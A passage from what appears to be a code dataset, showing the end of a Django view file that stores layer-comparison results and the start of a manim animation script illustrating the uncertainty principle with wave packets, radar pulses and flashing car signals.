len(body_dict[\"all_result_g\"]) == 0:\n g_vs_total_result_flag = False\n\n\n # 原始层文件信息,最全的\n all_layer_from_org = Layer.objects.filter(job=job)\n for item in body_dict[\"all_result_g\"].items():\n print(item[0],item[1])\n for each in all_layer_from_org:\n # print(\"layer:\",layer,\"str(each.layer_org).lower():\",str(each.layer_org).lower().replace(\" \",\"-\").replace(\"(\",\"-\").replace(\")\",\"-\"))\n if item[0] == str(each.layer_org).lower().replace(\" \", \"-\").replace(\"(\", \"-\").replace(\")\", \"-\"):\n print(\"I find it!!!!!!!!!!!!!!\")\n new_vs = Vs()\n new_vs.job = job\n new_vs.layer = each.layer\n new_vs.layer_org = each.layer_org\n new_vs.vs_result_detail = str(item[1])\n new_vs.vs_method = 'g'\n new_vs.layer_file_type = each.layer_file_type\n new_vs.layer_type = each.layer_type\n new_vs.vs_time_g = vs_time_g\n try:\n if item[1] == '正常':\n each.vs_result_g = 'passed'\n new_vs.vs_result = 'passed'\n elif item[1] == '错误':\n each.vs_result_g = 'failed'\n new_vs.vs_result = 'failed'\n g_vs_total_result_flag = False\n elif item[1] == '未比对':\n each.vs_result_g = 'none'\n new_vs.vs_result = 'none'\n g_vs_total_result_flag = False\n else:\n each.vs_result_g = 'failed'\n new_vs.vs_result = 'failed'\n g_vs_total_result_flag = False\n print(\"异常,状态异常!!!\")\n\n except:\n pass\n print(\"异常!\")\n each.vs_time_g = vs_time_g\n # print(\"each:\",each)\n each.save()\n # print(\"new_vs:\",new_vs)\n new_vs.save()\n\n if g_vs_total_result_flag == True:\n pass\n job.vs_result_g = 'passed'\n if g_vs_total_result_flag == False:\n pass\n job.vs_result_g = 'failed'\n job.vs_time_g = vs_time_g\n job.save()\n\n temp_path=r\"C:\\cc\\share\\temp\"\n # 删除temp_path\n if os.path.exists(temp_path):\n shutil.rmtree(temp_path)\n\n return HttpResponse(\"提交完成!!!\")\n\n return render(request,\"send_vs_g_local_result.html\")\n\n\ndef view_vs_g(request,job_id):\n pass\n #找到job对象\n job=JobForTest.objects.get(id=job_id)\n print(job.job_name,job.file)\n vs = Vs.objects.filter(job=job,vs_time_g=job.vs_time_g)\n\n field_verbose_name = [Vs._meta.get_field('job').verbose_name,\n Vs._meta.get_field('layer').verbose_name,\n Vs._meta.get_field('layer_org').verbose_name,\n Vs._meta.get_field('vs_result').verbose_name,\n Vs._meta.get_field('vs_result_detail').verbose_name,\n Vs._meta.get_field('vs_method').verbose_name,\n Vs._meta.get_field('layer_file_type').verbose_name,\n Vs._meta.get_field('layer_type').verbose_name,\n Vs._meta.get_field('features_count').verbose_name,\n Vs._meta.get_field('status').verbose_name,\n Vs._meta.get_field('vs_time_ep').verbose_name,\n Vs._meta.get_field('vs_time_g').verbose_name,\n Vs._meta.get_field('create_time').verbose_name,\n Vs._meta.get_field('updated').verbose_name,\n \"标签\",\n \"操作\",\n ]\n\n # return redirect('job_manage:LayerListView')\n return render(request, 'VsListViewOneJob.html', {'field_verbose_name': field_verbose_name, 'vs': vs,'job':job})\n\n\ndef test(request):\n pass\n return render(request,'test.html')\n\n\n","repo_name":"naivete13sky/epdms","sub_path":"eptest/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":27368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30258832533","text":"# -*- coding: utf-8 -*-\n\nimport scipy\nfrom manim_imports_ext import *\nfrom _2018.fourier import *\n\nimport warnings\nwarnings.warn(\"\"\"\n Warning: This file makes use of\n ContinualAnimation, which has since\n been deprecated\n\"\"\")\n\nFREQUENCY_COLOR = RED\nUSE_ALMOST_FOURIER_BY_DEFAULT = False\n\nclass GaussianDistributionWrapper(Line):\n \"\"\"\n This is meant to encode a 2d normal distribution as\n a mobject (so as to be able to have it be interpolated\n during animations). It is a line whose center is the mean\n mu of a distribution, and whose radial vector (center to end)\n is the distribution's standard deviation\n \"\"\"\n CONFIG = {\n \"stroke_width\" : 0,\n \"mu\" : ORIGIN,\n \"sigma\" : RIGHT,\n }\n def __init__(self, **kwargs):\n Line.__init__(self, ORIGIN, RIGHT, **kwargs)\n self.change_parameters(self.mu, self.sigma)\n\n def change_parameters(self, mu = None, sigma = None):\n curr_mu, curr_sigma = self.get_parameters()\n mu = mu if mu is not None else curr_mu\n sigma = sigma if sigma is not None else curr_sigma\n self.put_start_and_end_on(mu - sigma, mu + sigma)\n return self\n\n def get_parameters(self):\n \"\"\" Return mu_x, mu_y, sigma_x, sigma_y\"\"\"\n center, end = self.get_center(), self.get_end()\n return center, end-center\n\n def get_random_points(self, size = 1):\n mu, sigma = self.get_parameters()\n return np.array([\n np.array([\n np.random.normal(mu_coord, sigma_coord)\n for mu_coord, sigma_coord in zip(mu, sigma)\n ])\n for x in range(size)\n ])\n\nclass ProbabalisticMobjectCloud(ContinualAnimation):\n CONFIG = {\n \"fill_opacity\" : 0.25,\n \"n_copies\" : 100,\n \"gaussian_distribution_wrapper_config\" : {},\n \"time_per_change\" : 1./60,\n \"start_up_time\" : 0,\n }\n def __init__(self, prototype, **kwargs):\n digest_config(self, kwargs)\n fill_opacity = self.fill_opacity or prototype.get_fill_opacity()\n if \"mu\" not in self.gaussian_distribution_wrapper_config:\n self.gaussian_distribution_wrapper_config[\"mu\"] = prototype.get_center()\n self.gaussian_distribution_wrapper = GaussianDistributionWrapper(\n **self.gaussian_distribution_wrapper_config\n )\n self.time_since_last_change = np.inf\n group = VGroup(*[\n prototype.copy().set_fill(opacity = fill_opacity)\n for x in range(self.n_copies)\n ])\n ContinualAnimation.__init__(self, group, **kwargs)\n self.update_mobject(0)\n\n def update_mobject(self, dt):\n self.time_since_last_change += dt\n if self.time_since_last_change < self.time_per_change:\n return\n self.time_since_last_change = 0\n\n group = self.mobject\n points = self.gaussian_distribution_wrapper.get_random_points(len(group))\n for mob, point in zip(group, points):\n self.update_mobject_by_point(mob, point)\n return self\n\n def update_mobject_by_point(self, mobject, point):\n mobject.move_to(point)\n return self\n\nclass ProbabalisticDotCloud(ProbabalisticMobjectCloud):\n CONFIG = {\n \"color\" : BLUE,\n }\n def __init__(self, **kwargs):\n digest_config(self, kwargs)\n dot = Dot(color = self.color)\n ProbabalisticMobjectCloud.__init__(self, dot)\n\nclass ProbabalisticVectorCloud(ProbabalisticMobjectCloud):\n CONFIG = {\n \"color\" : RED,\n \"n_copies\" : 20,\n \"fill_opacity\" : 0.5,\n \"center_func\" : lambda : ORIGIN,\n }\n def __init__(self, **kwargs):\n digest_config(self, kwargs)\n vector = Vector(\n RIGHT, color = self.color,\n max_tip_length_to_length_ratio = 1,\n )\n ProbabalisticMobjectCloud.__init__(self, vector)\n\n def update_mobject_by_point(self, vector, point):\n vector.put_start_and_end_on(\n self.center_func(),\n point\n )\n\nclass RadarDish(SVGMobject):\n CONFIG = {\n \"file_name\" : \"radar_dish\",\n \"fill_color\" : GREY_B,\n \"stroke_color\" : WHITE,\n \"stroke_width\" : 1,\n \"height\" : 1,\n }\n\nclass Plane(SVGMobject):\n CONFIG = {\n \"file_name\" : \"plane\",\n \"color\" : GREY_B,\n \"height\" : 1,\n }\n def __init__(self, **kwargs):\n SVGMobject.__init__(self, **kwargs)\n self.rotate(-TAU/4)\n\nclass FalconHeavy(SVGMobject):\n CONFIG = {\n \"file_name\" : \"falcon_heavy\",\n \"color\" : WHITE,\n \"logo_color\" : BLUE_E,\n \"height\" : 1.5,\n }\n def __init__(self, **kwargs):\n SVGMobject.__init__(self, **kwargs)\n self.logo = self[-9:]\n self.logo.set_color(self.logo_color)\n\nclass RadarPulseSingleton(ContinualAnimation):\n CONFIG = {\n \"speed\" : 3.0,\n \"direction\" : RIGHT,\n \"start_up_time\" : 0,\n \"fade_in_time\" : 0.5,\n \"color\" : WHITE,\n \"stroke_width\" : 3,\n }\n def __init__(self, radar_dish, target, **kwargs):\n digest_config(self, kwargs)\n self.direction = self.direction/get_norm(self.direction)\n self.radar_dish = radar_dish\n self.target = target\n self.reflection_distance = None\n self.arc = Arc(\n start_angle = -30*DEGREES,\n angle = 60*DEGREES,\n )\n self.arc.set_height(0.75*radar_dish.get_height())\n self.arc.move_to(radar_dish, UP+RIGHT)\n self.start_points = np.array(self.arc.get_points())\n self.start_center = self.arc.get_center()\n self.finished = False\n\n ContinualAnimation.__init__(self, self.arc, **kwargs)\n \n def update_mobject(self, dt):\n arc = self.arc\n total_distance = self.speed*self.internal_time\n arc.set_points(self.start_points)\n arc.shift(total_distance*self.direction)\n\n if self.internal_time < self.fade_in_time:\n alpha = np.clip(self.internal_time/self.fade_in_time, 0, 1)\n arc.set_stroke(self.color, alpha*self.stroke_width)\n\n if self.reflection_distance is None:\n #Check if reflection is happening\n arc_point = arc.get_edge_center(self.direction)\n target_point = self.target.get_edge_center(-self.direction)\n arc_distance = np.dot(arc_point, self.direction)\n target_distance = np.dot(target_point, self.direction)\n if arc_distance > target_distance:\n self.reflection_distance = target_distance\n #Don't use elif in case the above code creates reflection_distance\n if self.reflection_distance is not None:\n delta_distance = total_distance - self.reflection_distance\n point_distances = np.dot(self.direction, arc.get_points().T)\n diffs = point_distances - self.reflection_distance\n shift_vals = np.outer(-2*np.maximum(diffs, 0), self.direction)\n arc.set_points(arc.get_points() + shift_vals)\n\n #Check if done\n arc_point = arc.get_edge_center(-self.direction)\n if np.dot(arc_point, self.direction) < np.dot(self.start_center, self.direction):\n self.finished = True\n self.arc.fade(1)\n\n def is_finished(self):\n return self.finished\n\nclass RadarPulse(ContinualAnimation):\n CONFIG = {\n \"n_pulse_singletons\" : 8,\n \"frequency\" : 0.05,\n \"colors\" : [BLUE, YELLOW]\n }\n def __init__(self, *args, **kwargs):\n digest_config(self, kwargs)\n colors = color_gradient(self.colors, self.n_pulse_singletons)\n self.pulse_singletons = [\n RadarPulseSingleton(*args, color = color, **kwargs)\n for color in colors\n ]\n pluse_mobjects = VGroup(*[ps.mobject for ps in self.pulse_singletons])\n ContinualAnimation.__init__(self, pluse_mobjects, **kwargs)\n \n def update_mobject(self, dt):\n for i, ps in enumerate(self.pulse_singletons):\n ps.internal_time = self.internal_time - i*self.frequency\n ps.update_mobject(dt)\n\n def is_finished(self):\n return all([ps.is_finished() for ps in self.pulse_singletons])\n\nclass MultipleFlashes(Succession):\n CONFIG = {\n \"run_time_per_flash\" : 1.0,\n \"num_flashes\" : 3,\n }\n def __init__(self, *args, **kwargs):\n digest_config(self, kwargs)\n kwargs[\"run_time\"] = self.run_time_per_flash\n Succession.__init__(self, *[\n Flash(*args, **kwargs)\n for x in range(self.num_flashes)\n ])\n\nclass TrafficLight(SVGMobject):\n CONFIG = {\n \"file_name\" : \"traffic_light\",\n \"height\" : 0.7,\n \"post_height\" : 2,\n \"post_width\" : 0.05,\n }\n def __init__(self, **kwargs):\n SVGMobject.__init__(self, **kwargs)\n post = Rectangle(\n height = self.post_height,\n width = self.post_width,\n stroke_width = 0,\n fill_color = WHITE,\n fill_opacity = 1,\n )\n self.move_to(post.get_top(), DOWN)\n self.add_to_back(post)\n\n###################\n\nclass MentionUncertaintyPrinciple(TeacherStudentsScene):\n def construct(self):\n title = OldTexText(\"Heisenberg Uncertainty Principle\")\n title.to_edge(UP)\n\n dot_cloud = ProbabalisticDotCloud()\n vector_cloud = ProbabalisticVectorCloud(\n gaussian_distribution_wrapper_config = {\"sigma_x\" : 0.2},\n center_func = lambda : dot_cloud.gaussian_distribution_wrapper.get_parameters()[0],\n )\n for cloud in dot_cloud, vector_cloud:\n cloud.gaussian_distribution_wrapper.next_to(\n title, DOWN, 2*LARGE_BUFF\n )\n vector_cloud.gaussian_distribution_wrapper.shift(3*RIGHT)\n\n def get_brace_text_group_update(gdw, vect, text, color):\n brace = Brace(gdw, vect)\n text = brace.get_tex(\"2\\\\sigma_{\\\\text{%s}}\"%text, buff = SMALL_BUFF)\n group = VGroup(brace, text)\n def update_group(group):\n brace, text = group\n brace.match_width(gdw, stretch = True)\n brace.next_to(gdw, vect)\n text.next_to(brace, vect, buff = SMALL_BUFF)\n group.set_color(color)\n return Mobject.add_updater(group, update_group)\n\n dot_brace_anim = get_brace_text_group_update(\n dot_cloud.gaussian_distribution_wrapper,\n DOWN, \"position\", dot_cloud.color\n )\n vector_brace_anim = get_brace_text_group_update(\n vector_cloud.gaussian_distribution_wrapper,\n UP, \"momentum\", vector_cloud.color\n )\n\n self.add(title)\n self.add(dot_cloud)\n self.play(\n Write(title),\n self.teacher.change, \"raise_right_hand\",\n self.change_students(*[\"pondering\"]*3)\n )\n self.play(\n Write(dot_brace_anim.mobject, run_time = 1)\n )\n self.add(dot_brace_anim)\n self.wait()\n # self.wait(2)\n self.play(\n dot_cloud.gaussian_distribution_wrapper.change_parameters, \n {\"sigma\" : 0.1*RIGHT},\n run_time = 2,\n )\n self.wait()\n self.add(vector_cloud)\n self.play(\n FadeIn(vector_brace_anim.mobject)\n )\n self.add(vector_brace_anim)\n self.play(\n vector_cloud.gaussian_distribution_wrapper.change_parameters,\n {\"sigma\" : RIGHT},\n self.change_students(*3*[\"confused\"]),\n run_time = 3,\n )\n #Back and forth\n for x in range(2):\n self.play(\n dot_cloud.gaussian_distribution_wrapper.change_parameters,\n {\"sigma\" : 2*RIGHT},\n vector_cloud.gaussian_distribution_wrapper.change_parameters,\n {\"sigma\" : 0.1*RIGHT},\n run_time = 3,\n )\n self.play_student_changes(\"thinking\", \"erm\", \"sassy\")\n self.play(\n dot_cloud.gaussian_distribution_wrapper.change_parameters,\n {\"sigma\" : 0.1*RIGHT},\n vector_cloud.gaussian_distribution_wrapper.change_parameters,\n {\"sigma\" : 1*RIGHT},\n run_time = 3,\n )\n self.wait()\n\nclass FourierTradeoff(Scene):\n CONFIG = {\n \"show_text\" : True,\n \"complex_to_real_func\" : lambda z : z.real,\n \"widths\" : [6, 0.02, 1],\n }\n def construct(self):\n #Setup axes\n time_mean = 4\n time_axes = Axes(\n x_min = 0,\n x_max = 2*time_mean,\n x_axis_config = {\"unit_size\" : 1.5},\n y_min = -2, \n y_max = 2,\n y_axis_config = {\"unit_size\" : 0.5}\n )\n time_label = OldTexText(\"Time\")\n time_label.scale(1.5)\n time_label.next_to(\n time_axes.x_axis.get_right(), UP+LEFT,\n buff = MED_SMALL_BUFF,\n )\n time_axes.add(time_label)\n time_axes.center().to_edge(UP)\n time_axes.x_axis.add_numbers(*list(range(1, 2*time_mean)))\n\n frequency_axes = Axes(\n x_min = 0,\n x_max = 8,\n x_axis_config = {\"unit_size\" : 1.5},\n y_min = -0.025,\n y_max = 0.075,\n y_axis_config = {\n \"unit_size\" : 30,\n \"tick_frequency\" : 0.025,\n },\n color = TEAL,\n )\n frequency_label = OldTexText(\"Frequency\")\n frequency_label.scale(1.5)\n frequency_label.next_to(\n frequency_axes.x_axis.get_right(), UP+LEFT,\n buff = MED_SMALL_BUFF, \n )\n frequency_label.set_color(FREQUENCY_COLOR)\n frequency_axes.add(frequency_label)\n frequency_axes.move_to(time_axes, LEFT)\n frequency_axes.to_edge(DOWN, buff = LARGE_BUFF)\n frequency_axes.x_axis.add_numbers()\n\n # Graph information\n\n #x-coordinate of this point determines width of wave_packet graph\n width_tracker = ExponentialValueTracker(0.5)\n get_width = width_tracker.get_value\n\n def get_wave_packet_function():\n factor = 1./get_width()\n return lambda t : (factor**0.25)*np.cos(4*TAU*t)*np.exp(-factor*(t-time_mean)**2)\n\n def get_wave_packet():\n graph = time_axes.get_graph(\n get_wave_packet_function(),\n num_graph_points = 200,\n )\n graph.set_color(YELLOW)\n return graph\n\n time_radius = 10\n def get_wave_packet_fourier_transform():\n return get_fourier_graph(\n frequency_axes, \n get_wave_packet_function(),\n t_min = time_mean - time_radius,\n t_max = time_mean + time_radius,\n n_samples = 2*time_radius*17,\n complex_to_real_func = self.complex_to_real_func,\n color = FREQUENCY_COLOR,\n )\n\n wave_packet = get_wave_packet()\n wave_packet_update = UpdateFromFunc(\n wave_packet, \n lambda g : Transform(g, get_wave_packet()).update(1)\n )\n fourier_graph = get_wave_packet_fourier_transform()\n fourier_graph_update = UpdateFromFunc(\n fourier_graph, \n lambda g : Transform(g, get_wave_packet_fourier_transform()).update(1)\n )\n\n arrow = Arrow(\n wave_packet, frequency_axes.coords_to_point(\n 4, frequency_axes.y_max/2,\n ),\n color = FREQUENCY_COLOR,\n )\n fourier_words = OldTexText(\"Fourier Transform\")\n fourier_words.next_to(arrow, LEFT, buff = MED_LARGE_BUFF)\n sub_words = OldTexText(\"(To be explained shortly)\")\n sub_words.set_color(BLUE)\n sub_words.scale(0.75)\n sub_words.next_to(fourier_words, DOWN)\n\n #Draw items\n self.add(time_axes, frequency_axes)\n self.play(ShowCreation(wave_packet, rate_func = double_smooth))\n anims = [ReplacementTransform(\n wave_packet.copy(), fourier_graph\n )]\n if self.show_text:\n anims += [\n GrowArrow(arrow),\n Write(fourier_words, run_time = 1)\n ]\n self.play(*anims)\n # self.play(FadeOut(arrow))\n self.wait()\n for width in self.widths:\n self.play(\n width_tracker.set_value, width,\n wave_packet_update,\n fourier_graph_update,\n run_time = 3\n )\n if sub_words not in self.mobjects and self.show_text:\n self.play(FadeIn(sub_words))\n else:\n self.wait()\n self.wait()\n\nclass ShowPlan(PiCreatureScene):\n def construct(self):\n self.add_title()\n words = self.get_words()\n self.play_sound_anims(words[0])\n self.play_doppler_anims(words[1])\n self.play_quantum_anims(words[2])\n\n def add_title(self):\n title = OldTexText(\"The plan\")\n title.scale(1.5)\n title.to_edge(UP)\n h_line = Line(LEFT, RIGHT).scale(FRAME_X_RADIUS)\n h_line.next_to(title, DOWN)\n self.add(title, h_line)\n\n def get_words(self):\n trips = [\n (\"sound waves\", \"(time vs. frequency)\", YELLOW),\n (\"Doppler radar\", \"(distance vs. velocity)\", GREEN),\n (\"quantum particles\", \"(position vs. momentum)\", BLUE),\n ]\n words = VGroup()\n for topic, tradeoff, color in trips:\n word = OldTexText(\"Uncertainty for\", topic, tradeoff)\n word[1:].set_color(color)\n word[2].scale(0.75)\n word[2].next_to(word[1], DOWN, buff = 1.5*SMALL_BUFF)\n words.add(word)\n words.arrange(DOWN, aligned_edge = LEFT, buff = MED_LARGE_BUFF)\n words.to_edge(LEFT)\n\n return words\n\n def play_sound_anims(self, word):\n morty = self.pi_creature\n wave = FunctionGraph(\n lambda x : 0.3*np.sin(15*x)*np.sin(0.5*x),\n x_min = 0, x_max = 30,\n step_size = 0.001,\n )\n wave.next_to(word, RIGHT)\n rect = BackgroundRectangle(wave, fill_opacity = 1)\n rect.stretch(2, 1)\n rect.next_to(wave, LEFT, buff = 0)\n always_shift(wave, direction=LEFT, rate=5)\n wave_fader = UpdateFromAlphaFunc(\n wave, \n lambda w, a : w.set_stroke(width = 3*a)\n )\n checkmark = self.get_checkmark(word)\n\n self.add(wave)\n self.add_foreground_mobjects(rect, word)\n self.play(\n Animation(word),\n wave_fader,\n morty.change, \"raise_right_hand\", word\n )\n self.wait(2)\n wave_fader.rate_func = lambda a : 1-smooth(a)\n self.add_foreground_mobjects(checkmark)\n self.play(\n Write(checkmark),\n morty.change, \"happy\",\n wave_fader, \n )\n self.remove_foreground_mobjects(rect, word)\n self.add(word)\n self.wait()\n\n def play_doppler_anims(self, word):\n morty = self.pi_creature\n\n radar_dish = RadarDish()\n radar_dish.next_to(word, DOWN, aligned_edge = LEFT)\n target = Plane()\n # target.match_height(radar_dish)\n target.next_to(radar_dish, RIGHT, buff = LARGE_BUFF)\n always_shift(target, direction = RIGHT, rate = 1.25)\n\n pulse = RadarPulse(radar_dish, target)\n\n checkmark = self.get_checkmark(word)\n\n self.add(target)\n self.play(\n Write(word),\n DrawBorderThenFill(radar_dish),\n UpdateFromAlphaFunc(\n target, lambda m, a : m.set_fill(opacity = a)\n ),\n morty.change, \"pondering\",\n run_time = 1\n )\n self.add(pulse)\n count = it.count() #TODO, this is not a great hack...\n while not pulse.is_finished() and next(count) < 15:\n self.play(\n morty.look_at, pulse.mobject,\n run_time = 0.5\n )\n self.play(\n Write(checkmark),\n UpdateFromAlphaFunc(\n target, lambda m, a : m.set_fill(opacity = 1-a)\n ),\n FadeOut(radar_dish),\n morty.change, \"happy\"\n )\n self.wait()\n\n def play_quantum_anims(self, word):\n morty = self.pi_creature\n dot_cloud = ProbabalisticDotCloud()\n gdw = dot_cloud.gaussian_distribution_wrapper\n gdw.next_to(word, DOWN, MED_LARGE_BUFF)\n gdw.rotate(5*DEGREES)\n gdw.save_state()\n gdw.scale(0)\n\n\n checkmark = self.get_checkmark(word)\n ish = OldTexText(\"$\\\\dots$ish\")\n ish.next_to(checkmark, RIGHT, -SMALL_BUFF, DOWN)\n\n self.add(dot_cloud)\n self.play(\n Write(word),\n FadeIn(dot_cloud.mobject),\n morty.change, \"confused\",\n )\n self.play(gdw.restore, run_time = 2)\n self.play(Write(checkmark))\n self.wait()\n self.play(\n Write(ish), \n morty.change, 'maybe'\n )\n self.wait(6)\n\n\n ##\n\n def get_checkmark(self, word):\n checkmark = OldTex(\"\\\\checkmark\")\n checkmark.set_color(GREEN)\n checkmark.scale(1.25)\n checkmark.next_to(word[1], UP+RIGHT, buff = 0)\n return checkmark\n\nclass StartWithIntuition(TeacherStudentsScene):\n def construct(self):\n self.teacher_says(\n \"You already \\\\\\\\ have this \\\\\\\\ intuition\",\n bubble_config = {\n \"height\" : 3.5,\n \"width\" : 3,\n },\n )\n self.play_student_changes(\"pondering\", \"erm\", \"maybe\")\n self.look_at(VectorizedPoint(4*LEFT + 2*UP))\n self.wait(5)\n\nclass TwoCarsAtRedLight(Scene):\n CONFIG = {\n \"text_scale_val\" : 0.75,\n }\n def construct(self):\n self.pull_up_behind()\n self.flash_in_sync_short_time()\n self.show_low_confidence()\n self.flash_in_sync_long_time()\n self.show_high_confidence()\n\n def pull_up_behind(self):\n #Setup Traffic light\n traffic_light = TrafficLight()\n traffic_light.move_to(6*RIGHT + 2.5*DOWN, DOWN)\n source_point = VectorizedPoint(\n traffic_light[2].get_right()\n )\n screen = Line(ORIGIN, UP)\n screen.next_to(source_point, RIGHT, LARGE_BUFF)\n red_light = Spotlight(\n color = RED,\n source_point = source_point,\n radius = 0.5,\n screen = screen,\n num_levels = 20,\n opacity_function = lambda r : 1/(10*r**2+1)\n )\n red_light.fade(0.5)\n red_light.rotate(TAU/2, about_edge = LEFT)\n self.add(red_light, traffic_light)\n\n #Setup cars\n car1, car2 = cars = self.cars = VGroup(*[\n Car() for x in range(2)\n ])\n cars.arrange(RIGHT, buff = LARGE_BUFF)\n cars.next_to(\n traffic_light, LEFT, \n buff = LARGE_BUFF, aligned_edge = DOWN\n )\n car2.pi_creature.set_color(GREY_BROWN)\n car1.start_point = car1.get_corner(DOWN+RIGHT)\n car1.shift(FRAME_X_RADIUS*LEFT)\n\n #Pull up car\n self.add(cars)\n self.play(\n SwitchOn(\n red_light, \n rate_func = squish_rate_func(smooth, 0, 0.3),\n ),\n Animation(traffic_light),\n self.get_flashes(car2, num_flashes = 3),\n MoveCar(\n car1, car1.start_point,\n run_time = 3,\n rate_func = rush_from,\n )\n )\n\n def flash_in_sync_short_time(self):\n car1, car2 = cars = self.cars\n\n #Setup axes\n axes = Axes(\n x_min = 0,\n x_max = 5,\n y_min = 0, \n y_max = 2,\n y_axis_config = {\n \"tick_frequency\" : 0.5,\n },\n )\n axes.x_axis.add_numbers(1, 2, 3)\n time_label = OldTexText(\"Time\")\n time_label.scale(self.text_scale_val)\n time_label.next_to(axes.x_axis.get_right(), DOWN)\n y_title = OldTexText(\"Signal\")\n y_title.scale(self.text_scale_val)\n y_title.next_to(axes.y_axis, UP, SMALL_BUFF)\n axes.add(time_label, y_title)\n axes.to_corner(UP+LEFT, buff = MED_SMALL_BUFF)\n graph = axes.get_graph(\n self.get_multispike_function(list(range(1, 4))),\n x_min = 0.8,\n x_max = 3.8,\n )\n graph.set_color(YELLOW)\n\n #Label short duration\n brace = Brace(Line(\n axes.input_to_graph_point(1, graph),\n axes.input_to_graph_point(3, graph),\n ), UP)\n text = OldTexText(\"Short duration observation\")\n text.scale(self.text_scale_val)\n text.next_to(brace, UP, SMALL_BUFF)\n text.align_to(\n axes.coords_to_point(0.25, 0), LEFT\n )\n\n\n self.play(\n self.get_flashes(car1, num_flashes = 2),\n self.get_flashes(car2, num_flashes = 2),\n LaggedStartMap(FadeIn, VGroup(\n axes, time_label, y_title,\n ))\n )\n self.play(\n self.get_flashes(car1, num_flashes = 3),\n self.get_flashes(car2, num_flashes = 3),\n ShowCreation(graph, rate_func=linear, run_time = 3)\n )\n self.play(\n self.get_flashes(car1, num_flashes = 10),\n self.get_flashes(car2, num_flashes = 10, run_time_per_flash = 0.98),\n GrowFromCenter(brace),\n Write(text),\n )\n\n self.time_axes = axes\n self.time_graph = graph\n self.time_graph_label = VGroup(\n brace, text\n )\n\n def show_low_confidence(self):\n car1, car2 = cars = self.cars\n time_axes = self.time_axes\n\n #Setup axes\n frequency_axes = Axes(\n x_min = 0,\n x_max = 3,\n y_min = 0,\n y_max = 1.5,\n y_axis_config = {\n \"tick_frequency\" : 0.5,\n }\n )\n frequency_axes.next_to(time_axes, DOWN, LARGE_BUFF)\n frequency_axes.set_color(GREY_B)\n frequency_label = OldTexText(\"Frequency\")\n frequency_label.scale(self.text_scale_val)\n frequency_label.next_to(frequency_axes.x_axis.get_right(), DOWN)\n frequency_axes.add(\n frequency_label,\n VectorizedPoint(frequency_axes.y_axis.get_top())\n )\n frequency_axes.x_axis.add_numbers(1, 2)\n frequency_graph = frequency_axes.get_graph(\n lambda x : np.exp(-4*(x-1)**2),\n x_min = 0,\n x_max = 2,\n )\n frequency_graph.set_color(RED)\n peak_point = frequency_axes.input_to_graph_point(\n 1, frequency_graph\n )\n\n #Setup label\n label = OldTexText(\"Low confidence\")\n label.scale(self.text_scale_val)\n label.move_to(peak_point + UP+RIGHT, DOWN)\n label.match_color(frequency_graph)\n arrow = Arrow(label.get_bottom(), peak_point, buff = 2*SMALL_BUFF)\n arrow.match_color(frequency_graph)\n\n self.play(\n ReplacementTransform(\n self.time_axes.copy(), frequency_axes\n ),\n ReplacementTransform(\n self.time_graph.copy(), frequency_graph\n ),\n )\n self.play(\n Write(label), \n GrowArrow(arrow)\n )\n self.wait()\n\n self.frequency_axes = frequency_axes\n self.frequency_graph = frequency_graph\n self.frequency_graph_label = VGroup(\n label, arrow\n )\n\n def flash_in_sync_long_time(self):\n time_graph = self.time_graph\n time_axes = self.time_axes\n frequency_graph = self.frequency_graph\n frequency_axes = self.frequency_axes\n\n n_spikes = 12\n new_time_graph = time_axes.get_graph(\n self.get_multispike_function(list(range(1, n_spikes+1))),\n x_min = 0.8,\n x_max = n_spikes + 0.8,\n )\n new_time_graph.match_color(time_graph)\n\n new_frequency_graph = frequency_axes.get_graph(\n lambda x : np.exp(-500*(x-1)**2),\n x_min = 0,\n x_max = 2,\n num_anchors = 500,\n )\n new_frequency_graph.match_color(self.frequency_graph)\n\n def pin_freq_graph_end_points(freq_graph):\n freq_graph.get_points()[0] = frequency_axes.coords_to_point(0, 0)\n freq_graph.get_points()[-1] = frequency_axes.coords_to_point(2, 0)\n\n self.play(LaggedStartMap(\n FadeOut, VGroup(\n self.time_graph_label,\n self.frequency_graph_label,\n self.time_graph,\n )\n ))\n self.play(\n ApplyMethod(\n self.time_axes.x_axis.stretch, 2.5, 0,\n {\"about_edge\" : LEFT},\n run_time = 4,\n rate_func = squish_rate_func(smooth, 0.3, 0.6),\n ),\n UpdateFromFunc(\n self.time_axes.x_axis.tip,\n lambda m : m.move_to(\n self.time_axes.x_axis.get_right(), \n LEFT\n )\n ),\n ShowCreation(\n new_time_graph,\n run_time = n_spikes,\n rate_func=linear,\n ),\n ApplyMethod(\n frequency_graph.stretch, 0.1, 0,\n run_time = n_spikes,\n ),\n UpdateFromFunc(frequency_graph, pin_freq_graph_end_points),\n *[\n self.get_flashes(car, num_flashes = n_spikes)\n for car in self.cars\n ]\n )\n\n self.new_time_graph = new_time_graph\n self.new_frequency_graph = new_frequency_graph\n\n def show_high_confidence(self):\n #Frequency stuff\n arrow = self.frequency_graph_label[1]\n label = OldTexText(\"High confidence\")\n label.scale(self.text_scale_val)\n label.next_to(arrow.get_start(), UP, SMALL_BUFF)\n label.match_color(arrow)\n\n frequency_axes = self.frequency_axes\n\n #Time stuff\n new_time_graph = self.new_time_graph\n brace = Brace(new_time_graph, UP, buff = SMALL_BUFF)\n text = OldTexText(\"Long duration observation\")\n text.scale(self.text_scale_val)\n text.next_to(brace, UP, buff = SMALL_BUFF)\n\n self.play(\n FadeIn(label),\n GrowArrow(arrow),\n *list(map(self.get_flashes, self.cars))\n )\n self.play(\n GrowFromCenter(brace),\n Write(text, run_time = 1),\n *list(map(self.get_flashes, self.cars))\n )\n self.play(*[\n self.get_flashes(car, num_flashes = 10)\n for car in self.cars\n ])\n\n ###\n\n def get_flashes(self, car, colors = [YELLOW, RED], num_flashes = 1, **kwargs):\n return AnimationGroup(*[\n MultipleFlashes(light, color, num_flashes = num_flashes, **kwargs)\n for light, color in zip(car.get_lights(), colors)\n ])\n\n def get_multispike_function(self, spike_times):\n return lambda x : sum([\n 1.25*np.exp(-100*(x-m)**2)\n for m in spike_times\n ])\n\nclass VariousMusicalNotes(Scene):\n def construct(self):\n freq = 20\n # x-coordinate of this point represents log(a)\n # where the bell curve component of the signal\n # is exp(-a*(x**2))\n graph_width_tracker = ExponentialValueTracker(1)\n def get_graph():\n a = graph_width_tracker.get_value()\n return FunctionGraph(\n lambda x : np.exp(-a*x**2)*np.sin(freq*x)-0.5,\n step_size = 0.001,\n )\n graph = get_graph()\n def graph_update(graph):\n graph.set_points(get_graph().get_points())\n graph_update_anim = UpdateFromFunc(graph, graph_update)\n def change_width_anim(width, **kwargs):\n a = 